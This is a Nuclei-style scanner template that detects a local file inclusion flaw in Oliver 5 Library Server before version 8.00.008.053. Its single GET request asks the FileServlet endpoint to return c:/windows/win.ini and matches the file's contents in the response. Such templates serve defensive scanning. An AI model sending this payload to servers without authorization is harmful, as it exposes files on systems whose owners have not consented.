id: oliver-library-lfi

info:
  name: Oliver 5 Library Server <8.00.008.053 - Local File Inclusion
  author: gy741
  severity: high
  description: Oliver 5 Library Server versions prior to 8.00.008.053 are vulnerable to local file inclusion via the FileServlet function.
  reference:
    - https://www.exploit-db.com/exploits/50599
    - https://www.softlinkint.com/product/oliver/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,oliver,edb,windows

http:
  - method: GET
    path:
      - "{{BaseURL}}/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

# digest: 4a0a00473045022003615a5a90e6828db33c45b5cc99c48d5bce18dad87acaa04a28bbd4e1d2ee6c022100f8c8743ecd0561327125038addbcb866561b7b350b60a29dadc782eb1411b685:922c64590222798bb761d5b6d8e72950
